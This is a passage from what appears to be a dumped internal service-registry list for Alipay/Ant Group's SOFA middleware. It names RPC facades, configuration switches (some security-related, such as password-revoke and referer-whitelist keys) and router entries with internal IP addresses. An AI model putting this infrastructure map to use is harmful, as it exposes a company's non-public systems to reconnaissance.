AULT_INSTANCE_ID#@#SOFA","com.alipay.contentfactory.common.service.facade.appx.rule.RuleItemOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthclaimmng.document.facade.ClaimDocumentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:kabaoprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.bpservice.facade.auth.ZkAuthServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:metricPreviewAuthCreateProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.OrderLinkQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.yebplusmarket.YebPlusMarketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.nearproxy.InventoryQueryClientServiceProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkfeaturecloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.globalprod.common.service.facade.leads.LeadsQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobilecashier@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.cpmSendMsgOpenConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcreditauthprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paylink.service.facade.RegistTaskManualTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.prodmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkaccountcore.service.facade.AccountMainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AmImgElementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.MetadataInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finbatch.finreconTddlDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.ZcbRepayService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.MenuWhiteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@datafin#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.finskyeye.common.service.facade.business.facade.ReqDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.FeedbackQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmLdcConstructFacade:1.0:opssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmChangeLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:paychecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundbankcore.common.service.facade.FundBankNoTradeInFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promox.facade.v2.OlapProxyFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.AutoInsTaobaoBannerFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CONSUMEPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.gov.common.facade.api.DataUsageAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bugscan.service.ApproveService:1.0:approveService@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.dasbi.common.service.facade.adame.AdameQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.cache.FxCacheManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.feed.CommonFeedQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.178.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbtaskcenter.common.service.facade.template.TaskTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradecore:name=com.alipay.tradecore.service.zoneclient.impl.TradeCreateElasticDRM.extInfoBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.biz.manager.subtask.SubTaskManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antdsr.common.service.facade.ProxyClient:1.0:antbuserviceProxyClient_antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.achelmetcore.common.service.facade.ProductAppRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.batchmount.BatchMountQueryOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revcore.common.service.finaccenter.facade.api.FinAccountingControlQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.biz.schedule.closebill.CloseBillLoader:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.CommonOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinstportal.common.service.facade.forward.bkinstassetprod.api.IaAssetRiskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.cancel.FintradeCancelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmonitor.common.service.facade.CategoryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cryptprod.common.service.facade.EncryptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmind.common.service.facade.api.RiskMindStoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.biz.service.prod.drm.ProdDrmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.ScriptValidateService:1.0:SMARTDELIVERY@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:amlmatrix_riskListOfflineCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscsalipay.common.service.facade.precheck.GenericBeanPreCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.changerequirement.facade.spi.ChangeIterationCheckSpi:1.0:opscloud@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ross.biz.decision.api.RiskStrategyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhcprod.common.service.facade.CaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fin.pdcore.common.service.facade.adapter.ProductRealSaleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.integration.consumeprod.ConsumeServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.common.service.antmanager.facade.AntManagerConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.QsStibFinanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finaicontentcore.api.solution.WebTracertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.224.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acccenter.common.service.facade.system.SystemReservedFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.LpLoanApplyConfigDrm.deferRunningWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.forexprod.biz.message.ws.PurchaseMessageSubscribeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.161.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:securityexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.product.spi.SecurityProductChecker:1.0:securityidentify@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_ats_guaranteePlanTemplatesImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appcompass.common.service.facade.experiment.ExperimentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.zappinfo.zappinfo_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizfund.common.service.facade.allocation.EntrustWithdrawDetailQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.68.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.query.AcctransAccountFreezeLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodel.core.service.facade.api.FramodelProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.TodoChangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:izplayback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.api.MyTagsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSasControlDrmResource.queryCapitalPlanCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.biz.shared.repository.AssetCashingApplyRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinTntBatchHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afts.common.service.facade.AlgorithmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.contentv2.ContentlibReviewTaskLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imif.common.service.facade.api.MerchantQueryFacade:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmtcaftscmdproc.common.service.facade.IotHardwareQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.sendMsgRollBack,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cdp.common.service.space.fatigue.UniformFatigueApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.uploadpic.UploadPicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.lifeapp.ContactInfoOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exctradequery.common.service.facade.ExcTradeModelQueryFacade:1.0:tradequeryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.23.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocontent.common.service.facade.api.hzf.build.ModuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.PointExpireDrmResouce.pointExpireConcurrencyControl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.abilitycore.common.service.facade.recommend.AbilityRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:processFinishPreCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.156.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instopen.service.facade.open.InstUserMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.aggregation.UserAggregateLimitFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.purchases.AssetPurchasesCostFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmerchantprod.common.service.sandbox.api.SandboxPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpayprod.common.service.facade.FamilyPointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.236.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kabaoprod.service.facade.merchant.MerchantPassCodeVerfiyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.237.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.airbops:name=com.alipay.airbops.biz.changemng.drm.ChangemngDrmConfig.jsonFormat1,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.customscenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiswisdom.platform.common.service.facade.api.tenant.TenantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emccenter.common.service.facade.api.BemcEventManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.purchases.AssetPurchasesGoodsItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.RunnablePackageQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.morderprod:name=com.alipay.morderprod.switch.districtProQueryVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mrchmobile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.dumpLogByCond,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanprod.common.service.facade.service.credit.CreditAcceptOfflineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:publicDomain_antfeaturecloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.amsAssistantTBaseCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.82.87.172#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-frdataaccess-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.isdsp.common.service.facade.DsIndicatorServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-antlescenter-taskMsg#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:dchainassetreg@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpromocore.common.service.backendfacade.api.PrizeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_MOBILE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitycap:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:operator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:finxbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundcore.common.service.facade.SeaLionProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.18.116.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dwmars.common.service.facade.CampCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.alinode:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:smartui@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csoperationmng.service.facade.api.ChatMonitorQueryService:1.0:csoperationmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.sofa.platform.xts.bacs.drm.ActionAppInfo.appFailoverRule,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gpfnfiveaccount@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.233.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.core.service.drm.DirectTransBalanceDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.236.152#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.routeClient:name=com.alipay.chair.businessgray.drm.renderGray.renderGrayAccountLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcb:name=com.alipay.finbaservice.common.service.facade.drm.FinbaserviceMigrateDrm.openAll,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.180.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.hasAddKoiTemplateIdDefaultValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.identity.ServiceAccountServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.clientcache.innerclient.slaver.api.InnerClientSlaverFacade:1.0:ordercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.client.spi.SPInterface:1.0:kbservindustryprodSPInterface@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:infosectask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.cloud.osp.console.openapi.OspOpenAPIConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.irisbizprod.facade.common.biz.trade.MerchantInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.salary.SettleAccountsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sre.cloudpaychecker.facade.account.BillRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.anna.facade.BigthingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.nearby.MobilelbsNearByTidService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_FUNDCARD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securitycore.common.service.facade.risk.api.RiskAdvicePolicyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillCrossRecommendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillBigDataCallBackFacade:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.depcore.service.facade.ArrangementFreezeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creditguarantee.common.service.facade.GuaranteeConfigManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.admin.ConnectionAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:authcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.249.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:aiapidocmock#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.cdl.digital.logistic.business.rpc.DLBusinessOpProvider:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchstm.common.service.facade.unifiedasset.sku.AssetUnifiedSkuMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchantsettle.common.service.facade.api.MerchantSettleOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbill.facade.service.PcreditBillScheduleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.236.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.84.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.accrmcore.common.service.facade.TenantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.240.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finvirtualta.core.service.yeb.repository.MinitransAccountModifyLogRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ilogin.common.service.facade.api.login.LoginProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.goldetfprod.common.service.facade.goods.api.FundTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialportal.web.task.rpc.facade.TaskFlowRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:fporgassetkeeper@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.ctemplate.ConditionTemplateConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prizecore.common.service.facade.service.SecCardQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillReverseIndexQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.TaskStrategyActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:fengdie@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.securitydata.common.service.velocity.opssla.VelocityHbaseConfigResource.velocityReadMode,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csaccurate.service.facade.mng.api.GuideCacheQueryService:1.0:rmaccurateService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.ServiceTrackService:1.0:outer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_1210#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_BKIBDEPOSIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rctrack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:datamove_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icbcenter.service.facade.api.ChargebackOccurServiceV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaocore.service.facade.VoucherQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:insclaimbff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_